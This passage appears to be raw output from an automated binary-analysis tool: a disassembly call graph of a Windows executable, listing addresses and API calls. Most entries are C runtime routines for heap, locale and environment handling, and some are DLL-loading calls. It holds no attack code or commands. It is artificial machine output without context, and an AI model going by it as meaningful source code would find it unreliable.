19015 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19014->19015 19015->19018 19018->18857 19019 7ff732074f08 _get_daylight 11 API calls 19019->19018 19021 7ff7320791b1 19020->19021 19034 7ff7320791ad 19020->19034 19043 7ff7320825f0 19021->19043 19026 7ff7320791c3 19028 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19026->19028 19027 7ff7320791cf 19069 7ff73207927c 19027->19069 19028->19034 19031 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19032 7ff7320791f6 19031->19032 19033 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19032->19033 19033->19034 19034->18906 19035 7ff7320794ec 19034->19035 19036 7ff732079515 19035->19036 19041 7ff73207952e 19035->19041 19036->18906 19037 7ff73207eb98 _get_daylight 11 API calls 19037->19041 19038 7ff7320795be 19040 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19038->19040 19039 7ff7320807e8 WideCharToMultiByte 19039->19041 19040->19036 19041->19036 19041->19037 19041->19038 19041->19039 19042 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19041->19042 19042->19041 19044 7ff7320825fd 19043->19044 19045 7ff7320791b6 19043->19045 19088 7ff73207b224 19044->19088 19049 7ff73208292c GetEnvironmentStringsW 19045->19049 19050 7ff73208295c 19049->19050 19051 7ff7320791bb 19049->19051 19052 7ff7320807e8 WideCharToMultiByte 19050->19052 19051->19026 19051->19027 19053 7ff7320829ad 19052->19053 19054 7ff7320829b4 FreeEnvironmentStringsW 19053->19054 19055 7ff73207d5fc _fread_nolock 12 API calls 19053->19055 19054->19051 19056 7ff7320829c7 19055->19056 19057 7ff7320829d8 19056->19057 19058 7ff7320829cf 19056->19058 19060 7ff7320807e8 WideCharToMultiByte 19057->19060 19059 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19058->19059 19061 7ff7320829d6 19059->19061 19062 7ff7320829fb 19060->19062 19061->19054 19063 7ff732082a09 19062->19063 19064 7ff7320829ff 19062->19064 19066 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19063->19066 19065 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19064->19065 19067 7ff732082a07 FreeEnvironmentStringsW 19065->19067 19066->19067 19067->19051 19070 7ff7320792a1 19069->19070 19071 7ff73207eb98 _get_daylight 11 API calls 19070->19071 19084 7ff7320792d7 19071->19084 19072 7ff7320792df 19073 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19072->19073 19074 7ff7320791d7 19073->19074 19074->19031 19075 7ff732079352 19076 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19075->19076 19076->19074 19077 7ff73207eb98 _get_daylight 11 API calls 19077->19084 19078 7ff732079341 19247 7ff7320794a8 19078->19247 19080 7ff73207a4a4 __std_exception_copy 37 API calls 19080->19084 19082 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19082->19072 19083 7ff732079377 19085 7ff73207a900 _isindst 17 API calls 19083->19085 19084->19072 19084->19075 19084->19077 19084->19078 19084->19080 19084->19083 19086 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19084->19086 19087 7ff73207938a 19085->19087 19086->19084 19089 7ff73207b235 FlsGetValue 19088->19089 19090 7ff73207b250 FlsSetValue 19088->19090 19091 7ff73207b24a 19089->19091 19092 7ff73207b242 19089->19092 19090->19092 19093 7ff73207b25d 19090->19093 19091->19090 19094 7ff73207b248 19092->19094 19095 7ff73207a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19092->19095 19096 7ff73207eb98 _get_daylight 11 API calls 19093->19096 19108 7ff7320822c4 19094->19108 19097 7ff73207b2c5 19095->19097 19098 7ff73207b26c 19096->19098 19099 7ff73207b28a FlsSetValue 19098->19099 19100 7ff73207b27a FlsSetValue 19098->19100 19101 7ff73207b2a8 19099->19101 19102 7ff73207b296 FlsSetValue 19099->19102 19103 7ff73207b283 19100->19103 19104 7ff73207aef4 _get_daylight 11 API calls 19101->19104 19102->19103 19105 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19103->19105 19106 7ff73207b2b0 19104->19106 19105->19092 19107 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19106->19107 19107->19094 19131 7ff732082534 19108->19131 19110 7ff7320822f9 19146 7ff732081fc4 19110->19146 19113 7ff73207d5fc _fread_nolock 12 API calls 19114 7ff732082327 19113->19114 19115 7ff73208232f 19114->19115 19117 7ff73208233e 19114->19117 19116 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19115->19116 19128 7ff732082316 19116->19128 19117->19117 19153 7ff73208266c 19117->19153 19120 7ff73208243a 19121 7ff732074f08 _get_daylight 11 API calls 19120->19121 19122 7ff73208243f 19121->19122 19123 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19122->19123 19123->19128 19124 7ff732082454 19125 7ff732082495 19124->19125 19129 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19124->19129 19126 7ff7320824fc 19125->19126 19164 7ff732081df4 19125->19164 19127 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19126->19127 19127->19128 19128->19045 19129->19125 19132 7ff732082557 19131->19132 19133 7ff732082561 19132->19133 19179 7ff7320802d8 EnterCriticalSection 19132->19179 19135 7ff7320825d3 19133->19135 19137 7ff73207a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19133->19137 19135->19110 19139 7ff7320825eb 19137->19139 19142 7ff73207b224 50 API calls 19139->19142 19145 7ff732082642 19139->19145 19143 7ff73208262c 19142->19143 19144 7ff7320822c4 65 API calls 19143->19144 19144->19145 19145->19110 19147 7ff732074f4c 45 API calls 19146->19147 19148 7ff732081fd8 19147->19148 19149 7ff732081ff6 19148->19149 19150 7ff732081fe4 GetOEMCP 19148->19150 19151 7ff73208200b 19149->19151 19152 7ff732081ffb GetACP 19149->19152 19150->19151 19151->19113 19151->19128 19152->19151 19154 7ff732081fc4 47 API calls 19153->19154 19155 7ff732082699 19154->19155 19156 7ff7320827ef 19155->19156 19158 7ff7320826d6 IsValidCodePage 19155->19158 19163 7ff7320826f0 __scrt_get_show_window_mode 19155->19163 19157 7ff73206c550 _log10_special 8 API calls 19156->19157 19159 7ff732082431 19157->19159 19158->19156 19160 7ff7320826e7 19158->19160 19159->19120 19159->19124 19161 7ff732082716 GetCPInfo 19160->19161 19160->19163 19161->19156 19161->19163 19180 7ff7320820dc 19163->19180 19246 7ff7320802d8 EnterCriticalSection 19164->19246 19181 7ff732082119 GetCPInfo 19180->19181 19190 7ff73208220f 19180->19190 19187 7ff73208212c 19181->19187 19181->19190 19182 7ff73206c550 _log10_special 8 API calls 19183 7ff7320822ae 19182->19183 19183->19156 19184 7ff732082e40 48 API calls 19185 7ff7320821a3 19184->19185 19191 7ff732087b84 19185->19191 19187->19184 19189 7ff732087b84 54 API calls 19189->19190 19190->19182 19192 7ff732074f4c 45 API calls 19191->19192 19193 7ff732087ba9 19192->19193 19196 7ff732087850 19193->19196 19197 7ff732087891 19196->19197 19198 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19197->19198 19201 7ff7320878db 19198->19201 19199 7ff732087b59 19200 7ff73206c550 _log10_special 8 API calls 19199->19200 19202 7ff7320821d6 19200->19202 19201->19199 19203 7ff73207d5fc _fread_nolock 12 API calls 19201->19203 19204 7ff732087a11 19201->19204 19206 7ff732087913 19201->19206 19202->19189 19203->19206 19204->19199 19205 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19204->19205 19205->19199 19206->19204 19207 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19206->19207 19208 7ff732087986 19207->19208 19208->19204 19227 7ff73207f0e4 19208->19227 19211 7ff732087a22 19213 7ff73207d5fc _fread_nolock 12 API calls 19211->19213 19215 7ff732087af4 19211->19215 19216 7ff732087a40 19211->19216 19212 7ff7320879d1 19212->19204 19214 7ff73207f0e4 __crtLCMapStringW 6 API calls 19212->19214 19213->19216 19214->19204 19215->19204 19217 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19215->19217 19216->19204 19218 7ff73207f0e4 __crtLCMapStringW 6 API calls 19216->19218 19217->19204 19219 7ff732087ac0 19218->19219 19219->19215 19220 7ff732087af6 19219->19220 19221 7ff732087ae0 19219->19221 19222 7ff7320807e8 WideCharToMultiByte 19220->19222 19223 7ff7320807e8 WideCharToMultiByte 19221->19223 19224 7ff732087aee 19222->19224 19223->19224 19224->19215 19225 7ff732087b0e 19224->19225 19225->19204 19226 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19225->19226 19226->19204 19233 7ff73207ed10 19227->19233 19230 7ff73207f12a 19230->19204 19230->19211 19230->19212 19232 7ff73207f193 LCMapStringW 19232->19230 19234 7ff73207ed6d 19233->19234 19236 7ff73207ed68 __vcrt_FlsAlloc 19233->19236 19234->19230 19243 7ff73207f1d0 19234->19243 19235 7ff73207ed9d LoadLibraryExW 19238 7ff73207ee72 19235->19238 19239 7ff73207edc2 GetLastError 19235->19239 19236->19234 19236->19235 19237 7ff73207ee92 GetProcAddress 19236->19237 19242 7ff73207edfc LoadLibraryExW 19236->19242 19237->19234 19241 7ff73207eea3 19237->19241 19238->19237 19240 7ff73207ee89 FreeLibrary 19238->19240 19239->19236 19240->19237 19241->19234 19242->19236 19242->19238 19244 7ff73207ed10 __crtLCMapStringW 5 API calls 19243->19244 19245 7ff73207f1fe __crtLCMapStringW 19244->19245 19245->19232 19248 7ff7320794ad 19247->19248 19249 7ff732079349 19247->19249 19250 7ff7320794d6 19248->19250 19251 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19248->19251 19249->19082 19252 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19250->19252 19251->19248 19252->19249 19254 7ff7320862c1 19253->19254 19256 7ff7320862d8 19253->19256 19255 7ff732074f08 _get_daylight 11 API calls 19254->19255 19258 7ff7320862c6 19255->19258 19256->19254 19257 7ff7320862e6 19256->19257 19260 7ff732074f4c 45 API calls 19257->19260 19261 7ff7320862d1 19257->19261 19259 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19258->19259 19259->19261 19260->19261 19261->18925 19263 7ff732074f4c 45 API calls 19262->19263 19264 7ff732088f71 19263->19264 19267 7ff732088bc8 19264->19267 19270 7ff732088c16 19267->19270 19268 7ff73206c550 _log10_special 8 API calls 19269 7ff732087205 19268->19269 19269->18925 19269->18946 19271 7ff732088c9d 19270->19271 19273 7ff732088c88 GetCPInfo 19270->19273 19276 7ff732088ca1 19270->19276 19272 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19271->19272 19271->19276 19274 7ff732088d35 19272->19274 19273->19271 19273->19276 19275 7ff73207d5fc _fread_nolock 12 API calls 19274->19275 19274->19276 19277 7ff732088d6c 19274->19277 19275->19277 19276->19268 19277->19276 19278 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19277->19278 19279 7ff732088dda 19278->19279 19280 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19279->19280 19290 7ff732088ebc 19279->19290 19282 7ff732088e00 19280->19282 19281 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19281->19276 19283 7ff73207d5fc _fread_nolock 12 API calls 19282->19283 19284 7ff732088e2d 19282->19284 19282->19290 19283->19284 19285 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19284->19285 19284->19290 19286 7ff732088ea4 19285->19286 19287 7ff732088ec4 19286->19287 19289 7ff732088eaa 19286->19289 19296 7ff73207ef68 19287->19296 19289->19290 19291 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19289->19291 19290->19276 19290->19281 19291->19290 19293 7ff732088f03 19293->19276 19295 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19293->19295 19294 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19294->19293 19295->19276 19297 7ff73207ed10 __crtLCMapStringW 5 API calls 19296->19297 19298 7ff73207efa6 19297->19298 19299 7ff73207efae 19298->19299 19300 7ff73207f1d0 __crtLCMapStringW 5 API calls 19298->19300 19299->19293 19299->19294 19301 7ff73207f017 CompareStringW 19300->19301 19301->19299 19303 7ff732087c5a HeapSize 19302->19303 19304 7ff732087c41 19302->19304 19305 7ff732074f08 _get_daylight 11 API calls 19304->19305 19306 7ff732087c46 19305->19306 19307 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19306->19307 19308 7ff732087c51 19307->19308 19308->18951 19310 7ff732087c89 19309->19310 19311 7ff732087c93 19309->19311 19312 7ff73207d5fc _fread_nolock 12 API calls 19310->19312 19313 7ff732087c98 19311->19313 19320 7ff732087c9f _get_daylight 19311->19320 19318 7ff732087c91 19312->19318 19314 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19313->19314 19314->19318 19315 7ff732087ca5 19317 7ff732074f08 _get_daylight 11 API calls 19315->19317 19316 7ff732087cd2 HeapReAlloc 19316->19318 19316->19320 19317->19318 19318->18955 19319 7ff732083590 _get_daylight 2 API calls 19319->19320 19320->19315 19320->19316 19320->19319 19322 7ff73207ed10 __crtLCMapStringW 5 API calls 19321->19322 19323 7ff73207ef44 19322->19323 19323->18959 19325 7ff7320754fa 19324->19325 19326 7ff7320754d6 19324->19326 19327 7ff732075554 19325->19327 19328 7ff7320754ff 19325->19328 19330 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19326->19330 19334 7ff7320754e5 19326->19334 19329 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19327->19329 19331 7ff732075514 19328->19331 19328->19334 19335 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19328->19335 19340 7ff732075570 19329->19340 19330->19334 19332 7ff73207d5fc _fread_nolock 12 API calls 19331->19332 19332->19334 19333 7ff732075577 GetLastError 19336 7ff732074e7c _fread_nolock 11 API calls 19333->19336 19334->18963 19334->18964 19335->19331 19339 7ff732075584 19336->19339 19337 7ff7320755b2 19337->19334 19338 7ff73207f8a0 _fread_nolock MultiByteToWideChar 19337->19338 19343 7ff7320755f6 19338->19343 19344 7ff732074f08 _get_daylight 11 API calls 19339->19344 19340->19333 19340->19337 19341 7ff7320755a5 19340->19341 19345 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19340->19345 19342 7ff73207d5fc _fread_nolock 12 API calls 19341->19342 19342->19337 19343->19333 19343->19334 19344->19334 19345->19341 19347 7ff732079225 19346->19347 19358 7ff732079221 19346->19358 19367 7ff732082a3c GetEnvironmentStringsW 19347->19367 19350 7ff73207923e 19374 7ff73207938c 19350->19374 19351 7ff732079232 19352 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19351->19352 19352->19358 19355 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19356 7ff732079265 19355->19356 19357 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19356->19357 19357->19358 19358->18992 19359 7ff7320795cc 19358->19359 19360 7ff732079606 19359->19360 19361 7ff7320795ef 19359->19361 19360->19361 19362 7ff73207eb98 _get_daylight 11 API calls 19360->19362 19363 7ff73207967a 19360->19363 19364 7ff73207f8a0 MultiByteToWideChar _fread_nolock 19360->19364 19366 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19360->19366 19361->18992 19362->19360 19365 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19363->19365 19364->19360 19365->19361 19366->19360 19368 7ff73207922a 19367->19368 19370 7ff732082a60 19367->19370 19368->19350 19368->19351 19369 7ff73207d5fc _fread_nolock 12 API calls 19371 7ff732082a97 memcpy_s 19369->19371 19370->19369 19372 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19371->19372 19373 7ff732082ab7 FreeEnvironmentStringsW 19372->19373 19373->19368 19375 7ff7320793b4 19374->19375 19376 7ff73207eb98 _get_daylight 11 API calls 19375->19376 19387 7ff7320793ef 19376->19387 19377 7ff7320793f7 19378 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19377->19378 19379 7ff732079246 19378->19379 19379->19355 19380 7ff732079471 19381 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19380->19381 19381->19379 19382 7ff73207eb98 _get_daylight 11 API calls 19382->19387 19383 7ff732079460 19384 7ff7320794a8 11 API calls 19383->19384 19386 7ff732079468 19384->19386 19385 7ff732080474 37 API calls 19385->19387 19389 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19386->19389 19387->19377 19387->19380 19387->19382 19387->19383 19387->19385 19388 7ff732079494 19387->19388 19390 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19387->19390 19391 7ff73207a900 _isindst 17 API calls 19388->19391 19389->19377 19390->19387 19392 7ff7320794a6 19391->19392 19395 7ff732088b31 __crtLCMapStringW 19393->19395 19394 7ff7320870ee 19394->19018 19394->19019 19395->19394 19396 7ff73207ef68 6 API calls 19395->19396 19396->19394 19643 7ff732079d50 19646 7ff732079ccc 19643->19646 19653 7ff7320802d8 EnterCriticalSection 19646->19653 19808 7ff73207afd0 19809 7ff73207afd5 19808->19809 19810 7ff73207afea 19808->19810 19814 7ff73207aff0 19809->19814 19815 7ff73207b03a 19814->19815 19816 7ff73207b032 19814->19816 19818 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19815->19818 19817 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19816->19817 19817->19815 19819 7ff73207b047 19818->19819 19820 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19819->19820 19821 7ff73207b054 19820->19821 19822 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19821->19822 19823 7ff73207b061 19822->19823 19824 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19823->19824 19825 7ff73207b06e 19824->19825 19826 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19825->19826 19827 7ff73207b07b 19826->19827 19828 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19827->19828 19829 7ff73207b088 19828->19829 19830 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19829->19830 19831 7ff73207b095 19830->19831 19832 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19831->19832 19833 7ff73207b0a5 19832->19833 19834 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19833->19834 19835 7ff73207b0b5 19834->19835 19840 7ff73207ae94 19835->19840 19854 7ff7320802d8 EnterCriticalSection 19840->19854 19657 7ff73206cb50 19658 7ff73206cb60 19657->19658 19674 7ff732079ba8 19658->19674 19660 7ff73206cb6c 19680 7ff73206ce48 19660->19680 19662 7ff73206cbd9 19663 7ff73206d12c 7 API calls 19662->19663 19673 7ff73206cbf5 19662->19673 19665 7ff73206cc05 19663->19665 19664 7ff73206cb84 _RTC_Initialize 19664->19662 19685 7ff73206cff8 19664->19685 19667 7ff73206cb99 19688 7ff732079014 19667->19688 19675 7ff732079bb9 19674->19675 19676 7ff732074f08 _get_daylight 11 API calls 19675->19676 19677 7ff732079bc1 19675->19677 19678 7ff732079bd0 19676->19678 19677->19660 19679 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19678->19679 19679->19677 19681 7ff73206ce59 19680->19681 19684 7ff73206ce5e __scrt_acquire_startup_lock 19680->19684 19682 7ff73206d12c 7 API calls 19681->19682 19681->19684 19683 7ff73206ced2 19682->19683 19684->19664 19713 7ff73206cfbc 19685->19713 19687 7ff73206d001 19687->19667 19689 7ff732079034 19688->19689 19690 7ff73206cba5 19688->19690 19691 7ff73207903c 19689->19691 19692 7ff732079052 GetModuleFileNameW 19689->19692 19690->19662 19712 7ff73206d0cc InitializeSListHead 19690->19712 19693 7ff732074f08 _get_daylight 11 API calls 19691->19693 19696 7ff73207907d 19692->19696 19694 7ff732079041 19693->19694 19695 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 19694->19695 19695->19690 19728 7ff732078fb4 19696->19728 19699 7ff7320790c5 19700 7ff732074f08 _get_daylight 11 API calls 19699->19700 19701 7ff7320790ca 19700->19701 19702 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19701->19702 19702->19690 19703 7ff7320790dd 19704 7ff7320790ff 19703->19704 19706 7ff73207912b 19703->19706 19707 7ff732079144 19703->19707 19705 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19704->19705 19705->19690 19708 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19706->19708 19710 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19707->19710 19709 7ff732079134 19708->19709 19711 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19709->19711 19710->19704 19711->19690 19714 7ff73206cfd6 19713->19714 19716 7ff73206cfcf 19713->19716 19717 7ff73207a1ec 19714->19717 19716->19687 19720 7ff732079e28 19717->19720 19727 7ff7320802d8 EnterCriticalSection 19720->19727 19729 7ff732078fcc 19728->19729 19730 7ff732079004 19728->19730 19729->19730 19731 7ff73207eb98 _get_daylight 11 API calls 19729->19731 19730->19699 19730->19703 19732 7ff732078ffa 19731->19732 19733 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19732->19733 19733->19730 16083 7ff73206cc3c 16104 7ff73206ce0c 16083->16104 16086 7ff73206cd88 16258 7ff73206d12c IsProcessorFeaturePresent 16086->16258 16087 7ff73206cc58 __scrt_acquire_startup_lock 16089 7ff73206cd92 16087->16089 16094 7ff73206cc76 __scrt_release_startup_lock 16087->16094 16090 7ff73206d12c 7 API calls 16089->16090 16092 7ff73206cd9d __FrameHandler3::FrameUnwindToEmptyState 16090->16092 16091 7ff73206cc9b 16093 7ff73206cd21 16110 7ff73206d274 16093->16110 16094->16091 16094->16093 16247 7ff732079b2c 16094->16247 16096 7ff73206cd26 16113 7ff732061000 16096->16113 16101 7ff73206cd49 16101->16092 16254 7ff73206cf90 16101->16254 16105 7ff73206ce14 16104->16105 16106 7ff73206ce20 __scrt_dllmain_crt_thread_attach 16105->16106 16107 7ff73206cc50 16106->16107 16108 7ff73206ce2d 16106->16108 16107->16086 16107->16087 16108->16107 16265 7ff73206d888 16108->16265 16292 7ff73208a4d0 16110->16292 16114 7ff732061009 16113->16114 16294 7ff732075484 16114->16294 16116 7ff7320637fb 16301 7ff7320636b0 16116->16301 16121 7ff73206c550 _log10_special 8 API calls 16124 7ff732063ca7 16121->16124 16122 7ff73206383c 16468 7ff732061c80 16122->16468 16123 7ff73206391b 16477 7ff7320645c0 16123->16477 16252 7ff73206d2b8 GetModuleHandleW 16124->16252 16127 7ff73206385b 16373 7ff732068830 16127->16373 16130 7ff73206396a 16500 7ff732062710 16130->16500 16132 7ff73206388e 16140 7ff7320638bb __std_exception_destroy 16132->16140 16472 7ff7320689a0 16132->16472 16134 7ff73206395d 16135 7ff732063984 16134->16135 16136 7ff732063962 16134->16136 16138 7ff732061c80 49 API calls 16135->16138 16496 7ff73207004c 16136->16496 16141 7ff7320639a3 16138->16141 16142 7ff732068830 14 API calls 16140->16142 16149 7ff7320638de __std_exception_destroy 16140->16149 16146 7ff732061950 115 API calls 16141->16146 16142->16149 16143 7ff732068940 40 API calls 16144 7ff732063a0b 16143->16144 16145 7ff7320689a0 40 API calls 16144->16145 16147 7ff732063a17 16145->16147 16148 7ff7320639ce 16146->16148 16150 7ff7320689a0 40 API calls 16147->16150 16148->16127 16151 7ff7320639de 16148->16151 16149->16143 16155 7ff73206390e __std_exception_destroy 16149->16155 16152 7ff732063a23 16150->16152 16153 7ff732062710 54 API calls 16151->16153 16154 7ff7320689a0 40 API calls 16152->16154 16195 7ff732063808 __std_exception_destroy 16153->16195 16154->16155 16156 7ff732068830 14 API calls 16155->16156 16157 7ff732063a3b 16156->16157 16158 7ff732063b2f 16157->16158 16159 7ff732063a60 __std_exception_destroy 16157->16159 16160 7ff732062710 54 API calls 16158->16160 16172 7ff732063aab 16159->16172 16386 7ff732068940 16159->16386 16160->16195 16162 7ff732068830 14 API calls 16163 7ff732063bf4 __std_exception_destroy 16162->16163 16164 7ff732063c46 16163->16164 16165 7ff732063d41 16163->16165 16166 7ff732063cd4 16164->16166 16167 7ff732063c50 16164->16167 16511 7ff7320644e0 16165->16511 16170 7ff732068830 14 API calls 16166->16170 16393 7ff7320690e0 16167->16393 16174 7ff732063ce0 16170->16174 16171 7ff732063d4f 16175 7ff732063d65 16171->16175 16176 7ff732063d71 16171->16176 16172->16162 16177 7ff732063c61 16174->16177 16180 7ff732063ced 16174->16180 16514 7ff732064630 16175->16514 16179 7ff732061c80 49 API calls 16176->16179 16183 7ff732062710 54 API calls 16177->16183 16189 7ff732063cc8 __std_exception_destroy 16179->16189 16184 7ff732061c80 49 API calls 16180->16184 16183->16195 16187 7ff732063d0b 16184->16187 16185 7ff732063dc4 16443 7ff732069390 16185->16443 16187->16189 16190 7ff732063d12 16187->16190 16188 7ff732063dd7 SetDllDirectoryW 16194 7ff732063e0a 16188->16194 16237 7ff732063e5a 16188->16237 16189->16185 16191 7ff732063da7 SetDllDirectoryW LoadLibraryExW 16189->16191 16193 7ff732062710 54 API calls 16190->16193 16191->16185 16193->16195 16197 7ff732068830 14 API calls 16194->16197 16195->16121 16196 7ff732064008 16199 7ff732064035 16196->16199 16200 7ff732064012 PostMessageW GetMessageW 16196->16200 16204 7ff732063e16 __std_exception_destroy 16197->16204 16198 7ff732063f1b 16448 7ff7320633c0 16198->16448 16591 7ff732063360 16199->16591 16200->16199 16207 7ff732063ef2 16204->16207 16211 7ff732063e4e 16204->16211 16210 7ff732068940 40 API calls 16207->16210 16210->16237 16211->16237 16517 7ff732066dc0 16211->16517 16237->16196 16237->16198 16248 7ff732079b64 16247->16248 16249 7ff732079b43 16247->16249 18710 7ff73207a3d8 16248->18710 16249->16093 16253 7ff73206d2c9 16252->16253 16253->16101 16255 7ff73206cfa1 16254->16255 16256 7ff73206cd60 16255->16256 16257 7ff73206d888 7 API calls 16255->16257 16256->16091 16257->16256 16259 7ff73206d152 _isindst __scrt_get_show_window_mode 16258->16259 16260 7ff73206d171 RtlCaptureContext RtlLookupFunctionEntry 16259->16260 16261 7ff73206d19a RtlVirtualUnwind 16260->16261 16262 7ff73206d1d6 __scrt_get_show_window_mode 16260->16262 16261->16262 16263 7ff73206d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16262->16263 16264 7ff73206d256 _isindst 16263->16264 16264->16089 16266 7ff73206d89a 16265->16266 16267 7ff73206d890 16265->16267 16266->16107 16271 7ff73206dc24 16267->16271 16272 7ff73206dc33 16271->16272 16273 7ff73206d895 16271->16273 16279 7ff73206de60 16272->16279 16275 7ff73206dc90 16273->16275 16276 7ff73206dcbb 16275->16276 16277 7ff73206dc9e DeleteCriticalSection 16276->16277 16278 7ff73206dcbf 16276->16278 16277->16276 16278->16266 16283 7ff73206dcc8 16279->16283 16289 7ff73206ddb2 TlsFree 16283->16289 16290 7ff73206dd0c __vcrt_FlsAlloc 16283->16290 16284 7ff73206dd3a LoadLibraryExW 16286 7ff73206dd5b GetLastError 16284->16286 16287 7ff73206ddd9 16284->16287 16285 7ff73206ddf9 GetProcAddress 16285->16289 16286->16290 16287->16285 16288 7ff73206ddf0 FreeLibrary 16287->16288 16288->16285 16290->16284 16290->16285 16290->16289 16291 7ff73206dd7d LoadLibraryExW 16290->16291 16291->16287 16291->16290 16293 7ff73206d28b GetStartupInfoW 16292->16293 16293->16096 16297 7ff73207f480 16294->16297 16295 7ff73207f4d3 16296 7ff73207a814 _invalid_parameter_noinfo 37 API calls 16295->16296 16300 7ff73207f4fc 16296->16300 16297->16295 16298 7ff73207f526 16297->16298 16604 7ff73207f358 16298->16604 16300->16116 16612 7ff73206c850 16301->16612 16304 7ff7320636eb GetLastError 16619 7ff732062c50 16304->16619 16305 7ff732063710 16614 7ff732069280 FindFirstFileExW 16305->16614 16309 7ff73206377d 16645 7ff732069440 16309->16645 16310 7ff732063723 16634 7ff732069300 CreateFileW 16310->16634 16312 7ff73206c550 _log10_special 8 API calls 16315 7ff7320637b5 16312->16315 16314 7ff73206378b 16318 7ff732062810 49 API calls 16314->16318 16321 7ff732063706 16314->16321 16315->16195 16323 7ff732061950 16315->16323 16317 7ff732063734 16637 7ff732062810 16317->16637 16318->16321 16320 7ff73206374c __vcrt_FlsAlloc 16320->16309 16321->16312 16324 7ff7320645c0 108 API calls 16323->16324 16325 7ff732061985 16324->16325 16326 7ff732061c43 16325->16326 16328 7ff732067f90 83 API calls 16325->16328 16327 7ff73206c550 _log10_special 8 API calls 16326->16327 16329 7ff732061c5e 16327->16329 16330 7ff7320619cb 16328->16330 16329->16122 16329->16123 16372 7ff732061a03 16330->16372 17047 7ff7320706d4 16330->17047 16331 7ff73207004c 74 API calls 16331->16326 16333 7ff7320619e5 16334 7ff732061a08 16333->16334 16335 7ff7320619e9 16333->16335 17051 7ff73207039c 16334->17051 16336 7ff732074f08 _get_daylight 11 API calls 16335->16336 16338 7ff7320619ee 16336->16338 17054 7ff732062910 16338->17054 16341 7ff732061a26 16343 7ff732074f08 _get_daylight 11 API calls 16341->16343 16342 7ff732061a45 16345 